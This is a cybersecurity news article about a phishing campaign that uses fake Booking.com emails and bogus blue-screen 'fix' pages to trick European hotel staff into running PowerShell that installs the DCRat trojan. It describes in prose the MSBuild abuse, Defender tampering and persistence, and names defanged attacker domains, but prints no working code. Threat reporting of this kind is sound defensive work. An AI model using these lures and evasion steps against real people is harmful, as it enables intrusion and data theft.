Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat - The Hacker News

Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat Ravie LakshmananJan 06, 2026Malware / Endpoint Security Source: Securonix Cybersecurity researchers have disclosed details of a new campaign dubbed PHALT#BLYX that has leveraged ClickFix-style lures to display fixes for fake blue screen of death (BSoD) errors in attacks targeting the European hospitality sector. The end goal of the multi-stage campaign is to deliver a remote access trojan known as DCRat, according to cybersecurity company Securonix. The activity was detected in late December 2025. "For initial access, the threat actors utilize a fake Booking.com reservation cancellation lure to trick victims into executing malicious PowerShell commands, which silently fetch and execute remote code," researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee said. The starting point of the attack chain is a phishing email impersonating Booking.com that contains a link to a fake website (e.g., "low-house[.]com"). The messages warn recipients of unexpected reservation cancellations, urging them to click the link to confirm the cancellation. The website to which the victim is redirected masquerades as Booking.com, and serves a fake CAPTCHA page that leads them to a bogus BSoD page with "recovery instructions" to open the Windows Run dialog, paste a command, and press the Enter key. In reality, this results in the execution of a PowerShell command that ultimately deploys DCRat. Specifically, this entails a multi-step process that commences with the PowerShell dropper downloading an MSBuild project file ("v.proj") from "2fa-bns[.]com", which is then executed using "MSBuild.exe" to run an embedded payload responsible for configuring Microsoft Defender Antivirus exclusions to evade detection, setting up persistence on the host in the Startup folder, and launching the RAT malware after downloads it from the same location as the MSBuild project. It's also capable of disabling the security program altogether if found to be running with administrator privileges. If it doesn't have elevated rights, the malware enters a loop that triggers a Windows User Account Control (UAC) prompt every two seconds for three times in hopes that the victim will grant it the necessary permissions out of sheer frustration. In tandem, the PowerShell code takes steps to open the legitimate Booking.com admin page in the default browser as a distraction mechanism and to give an impression to the victim that the action was legitimate. DCRat, also called DarkCrystal RAT and a variant of AsyncRAT, is an off-the-shelf .NET trojan that can harvest sensitive information and expand its functionality by means of a plugin-based architecture. It's equipped to connect to an external server, profile the infected system, and await incoming commands from the server, enabling the attackers to log keystrokes, run arbitrary commands, and deliver additional payloads like a cryptocurrency miner. The campaign is an example of how threat actors are leveraging living-off-the-land (LotL) techniques, such as abusing trusted system binaries like "MSBuild.exe," to move the attack to the next stage, establish a deeper foothold, and maintain persistence within compromised hosts. "The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organizations," Securonix said. "The use of the Russian language within the 'v.proj' MSBuild file links this activity to Russian threat factors using DCRat." "The use of a customized MSBuild project file to proxy execution, coupled with aggressive tampering of Windows Defender exclusions, demonstrates a deep understanding of modern endpoint protection mechanisms." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  cybersecurity, endpoint security, Living-Off-The-Land, Malware, Phishing, Remote Access Trojan, social engineering, Threat Intelligence, windows security Trending News Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1 Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model 149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited ThreatsDay Bulletin: DDR5 Bot Scalping, Samsung TV Tracking, Reddit Privacy Fine and More Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication APT28 Tied to CVE-2026-21513 MSHTML 0-Day Exploited Before Feb 2026 Patch Tuesday ⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack and Vibe-Coded Malware OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries Load More ▼ Popular Resources Read CYBER360 2026: From Zero Trust Limits to Data-Centric Security Paths Identity Controls Checklist: Find Missing Protections in Apps Self-Hosted WAF: Block SQLi, XSS, and Bots Before They Reach Your Apps 19,053 Confirmed Breaches in 2025 – Key Trends and Predictions for 2026